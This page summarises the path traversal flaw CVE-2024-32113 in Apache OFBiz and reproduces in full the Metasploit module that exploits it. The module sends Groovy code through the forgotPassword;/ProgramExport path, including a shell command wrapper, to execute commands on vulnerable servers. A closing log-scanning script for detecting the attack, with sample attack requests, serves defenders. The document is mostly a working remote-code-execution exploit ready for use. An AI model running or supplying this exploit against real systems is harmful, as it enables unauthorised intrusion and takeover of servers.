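Apache OFBiz versions prior to 18.12.13 contain a path traversal vulnerability. An attacker can exploit it to reach the /webtools/control/forgotPassword endpoint and, through it, the ProgramExport endpoint, ultimately executing remote code as the user running the application.
🎯 The vulnerability affects Apache OFBiz versions prior to 18.12.13; an attacker can exploit it to access the /webtools/control/forgotPassword endpoint.
🎯 By accessing the ProgramExport endpoint, an attacker can execute remote code as the user running the application and so gain control of the system.
🎯 The vulnerability relies on a path traversal flaw in Apache OFBiz, which an attacker can use to access the application's sensitive files and directories.
🎯 Exploitation may lead to data leakage, system crashes, or other security problems.
🎯 All Apache OFBiz users are advised to upgrade to the latest version or apply the security patch as soon as possible to fix the vulnerability.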
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache OFBiz Forgot Password Directory Traversal',
        'Description' => %q{
          Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable
          endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in
          turn allows for remote code execution in the context of the user running the application.
        },
        'Author' => [
          'Mr-xn', # PoC
          'jheysel-r7' # module
        ],
        'References' => [
          [ 'URL', 'https://github.com/Mr-xn/CVE-2024-32113'],
          [ 'URL', 'https://xz.aliyun.com/t/14733?time__1311=mqmx9Qwx0WDsd5YK0%3Dai%3Dmd7KbxGupD&alichlgref=https%3A%2F%2Fgithub.com%2FMr-xn%2FCVE-2024-32113'],
          [ 'CVE', '2024-32113']
        ],
        'License' => MSF_LICENSE,
        'Platform' => %w[linux win],
        'Privileged' => true, # You get a root session when exploiting a docker container though user level session on Windows.
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Linux Command',
            {
              'Platform' => ['linux', 'unix'],
              'Arch' => [ARCH_CMD],
              'Type' => :unix_cmd
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => ['win'],
              'Arch' => [ARCH_CMD],
              'Type' => :win_cmd
            }
          ],
        ],
        'Payload' => {
          'BadChars' => "\x3a"
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2024-05-30',
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        },
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 8443
        }
      )
    )
  end

  def send_cmd_injection(cmd)
    data = "groovyProgram=throw+new+Exception('#{cmd}'.execute().text);"

    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/webtools/control/forgotPassword;/ProgramExport'),
      'headers' => {
        'HOST' => '127.0.0.1'
      },
      'method' => 'POST',
      'data' => data
    })
  end

  def check
    echo_test_string = rand_text_alpha(8..12)
    case target['Type']
    when :win_cmd
      test_payload = to_unicode_escape("cmd.exe /c echo #{echo_test_string}")
    when :unix_cmd
      test_payload = to_unicode_escape("echo #{echo_test_string}")
    else
      return CheckCode::Unknown('Please select a valid target')
    end

    res = send_cmd_injection(test_payload)
    return CheckCode::Unknown('Target did not respond to check.') unless res

    unless res.get_html_document&.xpath("//div[@class='content-messages errorMessage' and .//p[contains(text(), 'java.lang.Exception: #{echo_test_string}')]]")&.empty?
      return CheckCode::Vulnerable('Tested remote code execution successfully')
    end

    CheckCode::Safe('Attempting to exploit vulnerability failed.')
  end

  def to_unicode_escape(str)
    str.chars.map { |char| '\u%04x' % char.ord }.join
  end

  def exploit
    print_status('Attempting to exploit...')
    res = ''
    case target['Type']
    when :win_cmd
      res = send_cmd_injection(payload.encoded)
    when :unix_cmd
      res = send_cmd_injection(to_unicode_escape("sh -c $@|sh . echo #{payload.raw}"))
    else
      fail_with(Failure::BadConfig, 'Invalid target specified')
    end

    print_error('The target responded to the exploit attempt which is not expected. The exploit likely failed') if res
  end
end
```
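A defender-side check for the request shape used above, added here as an example that is not part of the original page or of the Metasploit module: it scans web access logs for requests under /webtools/control/ that carry a `;` path parameter or that name ProgramExport behind another request name. The combined log format, the function names and the sample log lines are assumptions constructed for the example; the dot-segment and percent-decoding checks generalize beyond the single URI shown on the page.

```ruby
CONTROL = '/webtools/control/'
REQUEST_RE = /"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+" (?<status>\d{3})/

# Drop the query string and percent-decode (up to three rounds) so a ';'
# logged as %3B or %253B by a proxy still matches.
def normalize_path(target)
  path = target.split('?', 2).first.b
  3.times do
    decoded = path.gsub(/%([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
    break if decoded == path
    path = decoded
  end
  path
end

# Returns nil for unremarkable lines, otherwise a hash describing the finding.
def suspicious_request(line)
  m = REQUEST_RE.match(line) or return nil
  path = normalize_path(m[:target])
  idx = path.downcase.index(CONTROL) or return nil
  tail = path[(idx + CONTROL.length)..]
  segments = tail.split(%r{[;/]})
  first = segments.first.to_s # request name at the start of the control path
  reasons = []
  reasons << 'path parameter (;) in control URI' if tail.include?(';')
  reasons << 'dot segment in control URI' if segments.include?('..')
  if tail =~ /ProgramExport/i && first.downcase != 'programexport'
    reasons << "ProgramExport requested behind #{first}"
  end
  return nil if reasons.empty?
  { method: m[:method], path: path, status: m[:status].to_i, reasons: reasons }
end

def scan(log_text)
  log_text.each_line.map { |line| suspicious_request(line) }.compact
end

# Constructed sample lines (documentation IP ranges), not taken from a real system.
SAMPLE_LOG = <<~'LOG'
  203.0.113.7 - - [01/Jun/2024:10:00:01 +0000] "POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1" 200 5120
  203.0.113.7 - - [01/Jun/2024:10:00:02 +0000] "POST /webtools/control/forgotPassword%3B/ProgramExport HTTP/1.1" 200 5120
  198.51.100.4 - - [01/Jun/2024:10:01:00 +0000] "GET /webtools/control/forgotPassword HTTP/1.1" 200 2048
  198.51.100.4 - - [01/Jun/2024:10:02:00 +0000] "POST /webtools/control/ProgramExport HTTP/1.1" 200 4096
LOG

scan(SAMPLE_LOG).each { |f| puts "#{f[:method]} #{f[:path]} -> #{f[:reasons].join(', ')}" }
```

A direct request to /webtools/control/ProgramExport is deliberately not flagged, since it goes through the normal login check; any hit on an instance older than 18.12.13 should be triaged together with the response status and any `java.lang.Exception` error messages in the application log.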